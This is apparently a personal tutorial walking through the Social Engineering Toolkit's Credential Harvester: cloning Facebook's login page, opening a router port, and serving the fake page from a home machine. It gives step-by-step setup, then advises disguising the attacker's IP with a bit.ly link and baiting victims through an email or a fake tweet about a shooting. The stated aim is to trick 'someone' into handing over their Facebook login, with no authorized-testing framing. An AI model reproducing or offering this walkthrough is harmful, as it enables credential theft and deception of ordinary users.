I realize there are many tutorials already written online for how to use the Social Engineering Toolkit (SET), including one really good one over at Metasploit Unleashed that covers all of the basics.
However, I find that I generally mess around with this tool only a couple times a year when it gets a major update or I want to try some new attack vectors. Unfortunately, when I use it that infrequently, it means that I basically have to re-learn everything all over again. Therefore, I've decided to log everything here so next time I feel like I really need it, I know I can come back to reference this.
My goal here was to create an attack that would allow me to trick someone into sending me their login and password for Facebook. The general idea behind this attack is that SET will clone the target website (in this case, http://www.facebook.com) and host it on your personal computer. The trick then is to convince someone to visit a link you crafted that points to your fake Facebook clone and get them to log in with their credentials (displaying it in Metasploit). Once they send you their credentials, the server you are hosting points the victim back to the real Facebook login page and (hopefully) they never know what happened.
For this exercise I used Backtrack 4 R2 and the latest version of SET (updated 4/15/2011) over a regular home network with a NETGEAR WGR614v8 wireless router.
While it seems like this would be a relatively straightforward process using the easily navigated SET menu structure, there are a few things that needed to be modified first. First and foremost, most people running SET are not connected directly to the open Internet. Therefore, the SET configurations must be modified to not attempt to auto-detect your IP address. To do this, navigate to the SET directory and modify the set_config file using your favorite text editor. In this instance, I'm using gedit.
# cd /pentests/exploits/SET/config
# gedit set_config
Find the line that by default reads AUTO_DETECT=ON, change it to read AUTO_DETECT=OFF, and save and close the document. This will cause SET to prompt you for your external IP address when you launch the Credential Harvester, which you can find by going to www.whatismyip.com.
Next, we need to set up the router for port forwarding so people from the outside Internet can connect to the fake web server. In order to do this with my particular router, you must first navigate to http://192.168.1.1 and login to the control panel. From there, scroll down to Port Forwarding/Port Triggering on the left-hand side. From there, add a custom service that forwards traffic through Port 80 on TCP/UDP to your local IP address (in my case, 192.168.1.4)
Now that our configurations are ready, the next step is to open SET. Either go to Start->Backtrack->Penetration->Social Engineering Toolkit->Social Engineering Toolkit or running the following from the command line:
# cd /pentest/exploits/SET/
# python set
That launches the following screen:
:::::::: :::::::::: :::::::::::
:+: :+: :+: :+:
+:+ +:+ +:+
+#++:++#++ +#++:++# +#+
+#+ +#+ +#+
#+# #+# #+# #+#
######## ########## ###
[---] The Social-Engineer Toolkit (SET) [---]
[---] Written by: David Kennedy (ReL1K) [---]
[---] Development Team: Thomas Werth [---]
[---] Version: 1.3.4 [---]
[---] Codename: 'Artillery Edition' [---]
[---] Report bugs to: firstname.lastname@example.org [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] Framework: http://www.social-engineer.org [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com
Select from the menu:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8. Wireless Access Point Attack Vector
9. Third Party Modules
10. Update the Metasploit Framework
11. Update the Social-Engineer Toolkit
12. Help, Credits, and About
13. Exit the Social-Engineer Toolkit
Enter your choice:
From there, select option 2. Website Attack Vectors. Then you will see the following options:
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu
Enter your choice (press enter for default):
Select option 3. Credential Harvester Attack Method
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu
Enter number (1-4):
Select option 2. Site Cloner
This option is used for what IP the server will POST to.
If your using an external IP, use your external IP for this.
Enter the IP address for the POST back in Harvester/Tabnabbing:
Here you input your external IP address. Again, this can be found by going to www.whatismyip.com.
Enter the url to clone:
Here you put in the site you want to clone. In this instance, http://www.facebook.com. SET will then clone the site you input. Press return to progress past the message that mentions username and password form fields.
The server is now up and running. Anyone who now navigates to your external IP address will be presented with the fake Facebook login page you have cloned. Once they input their login credentials they will show up in your terminal and the victim will be forwarded to the real Facebook site.
Now, obviously most people will not click on a link that looks like a random IP address. However, there are multiple ways to disguise that link. My favorite of which is converting the IP address into a bit.ly link. To do this, copy your external IP address and go to http://bit.ly/. Paste the external IP address and click the 'shorten' button. This will convert the link to something like http://bit.ly/900913 that looks a bit more friendly than a raw IP address. Then, you can feel free to add it to a specially crafted email sent to your victim, or cast a wider fishnet and post a Tweet like:
@Phisherman123: Shooting at Fells Point Pirate Festival http://bit.ly/ysqb.
...and see who tries to log in!